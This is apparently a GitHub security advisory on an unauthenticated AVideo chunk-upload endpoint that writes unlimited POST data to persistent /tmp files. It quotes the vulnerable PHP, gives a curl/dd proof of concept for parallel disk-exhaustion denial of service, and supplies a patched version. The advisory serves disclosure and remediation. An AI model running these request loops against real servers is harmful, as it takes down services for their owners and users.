GHSA-vv7w-qf5c-734w

Summary

The aVideoEncoderChunk.json.php endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in /tmp/ with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server.

Details

The file objects/aVideoEncoderChunk.json.php (25 lines total) operates entirely outside the AVideo framework:

// objects/aVideoEncoderChunk.json.php — full file
<?php
header('Access-Control-Allow-Origin: *');           // Line 2: CORS wildcard
header('Content-Type: application/json');
$obj = new stdClass();
$obj->file = tempnam(sys_get_temp_dir(), 'YTPChunk_');  // Line 5: creates /tmp/YTPChunk_XXXXXX

$putdata = fopen("php://input", "r");              // Line 7: reads raw POST body
$fp = fopen($obj->file, "w");

while ($data = fread($putdata, 1024 * 1024)) {     // Line 12: 1MB chunks, no limit
    fwrite($fp, $data);
}

fclose($fp);
fclose($putdata);
sleep(1);
$obj->filesize = filesize($obj->file);

$json = json_encode($obj);
die($json);                                         // Line 25: returns {"file":"/tmp/YTPChunk_abc123","filesize":104857600}

The vulnerability chain:

1. No authentication: The script includes no session handling, no require_once of the framework, no useVideoHashOrLogin(), no canUpload() — nothing. Compare with aVideoEncoder.json.php which includes configuration.php and calls authentication functions.

2. No size limits: php://input is read until exhaustion. The effective limit is PHP's post_max_size, which AVideo's .htaccess has commented-out settings for 4GB (#php_value post_max_size 4G at line 536). Default AVideo installations recommend at least 100MB.

3. No cleanup: A grep for YTPChunk_ across the entire codebase returns only the chunk file itself. No cron job, no garbage collection, no consumer that deletes files after processing. The temp files persist until the server is manually cleaned.

4. Path disclosure: The response JSON includes the full filesystem temp path (e.g., /tmp/YTPChunk_abc123), revealing server directory structure.

5. CORS wildcard: Access-Control-Allow-Origin: * on line 2 means any malicious webpage can trigger this attack via the visitor's browser, potentially distributing the attack across many source IPs.

6. Public routing: .htaccess line 437 rewrites /aVideoEncoderChunk.json to this file, making it accessible at a clean URL.

PoC

Step 1: Confirm endpoint is accessible and unauthenticated

curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary 'test'

Expected output:

{"file":"/tmp/YTPChunk_XXXXXX","filesize":4}

Step 2: Write a large temp file (100MB)

dd if=/dev/zero bs=1M count=100 2>/dev/null | \
  curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary @-

Expected output:

{"file":"/tmp/YTPChunk_YYYYYY","filesize":104857600}

Step 3: Parallel disk exhaustion (10 concurrent 100MB requests = 1GB)

for i in $(seq 1 10); do
  dd if=/dev/zero bs=1M count=100 2>/dev/null | \
    curl -s -X POST https://target/aVideoEncoderChunk.json \
    -H 'Content-Type: application/octet-stream' \
    --data-binary @- &
done
wait

Step 4: Verify files persist (they are never cleaned up)

# On the server:
ls -la /tmp/YTPChunk_*
# All files remain indefinitely

Impact

• Denial of Service: Filling /tmp/ causes cascading failures — PHP session handling breaks, MySQL temp tables fail, and system services relying on tmpfs crash. This can take down the entire server, not just AVideo.
• No authentication barrier: Any anonymous internet user can trigger this attack.
• Cross-origin exploitation: The CORS wildcard header allows any malicious website to use visitors' browsers as distributed attack proxies, bypassing IP-based rate limiting at the network level.
• Information disclosure: The temp file path in the response reveals the server's filesystem layout.
• Persistence: Created files are never cleaned up, so even a brief attack has lasting impact until manual intervention.

Recommended Fix

Replace objects/aVideoEncoderChunk.json.php with a version that includes authentication, size limits, and cleanup:

<?php
if (empty($global)) {
    $global = [];
}
require_once '../videos/configuration.php';

header('Content-Type: application/json');
allowOrigin(); // Use AVideo's configured CORS instead of wildcard

// Require authentication
$userObj = new User(0);
if (!User::canUpload()) {
    http_response_code(403);
    die(json_encode(['error' => true, 'msg' => 'Not authorized']));
}

// Enforce size limit (e.g., 200MB)
$maxSize = 200 * 1024 * 1024;
$contentLength = isset($_SERVER['CONTENT_LENGTH']) ? (int)$_SERVER['CONTENT_LENGTH'] : 0;
if ($contentLength > $maxSize) {
    http_response_code(413);
    die(json_encode(['error' => true, 'msg' => 'Payload too large']));
}

$obj = new stdClass();
$obj->file = tempnam(sys_get_temp_dir(), 'YTPChunk_');

$putdata = fopen("php://input", "r");
$fp = fopen($obj->file, "w");
$written = 0;

while ($data = fread($putdata, 1024 * 1024)) {
    $written += strlen($data);
    if ($written > $maxSize) {
        fclose($fp);
        fclose($putdata);
        unlink($obj->file);
        http_response_code(413);
        die(json_encode(['error' => true, 'msg' => 'Payload too large']));
    }
    fwrite($fp, $data);
}

fclose($fp);
fclose($putdata);

$obj->filesize = filesize($obj->file);
// Do not expose full filesystem path
$obj->file = basename($obj->file);

die(json_encode($obj));

Additionally, add a cleanup cron job or garbage collection to remove YTPChunk_* files older than a configurable timeout (e.g., 1 hour).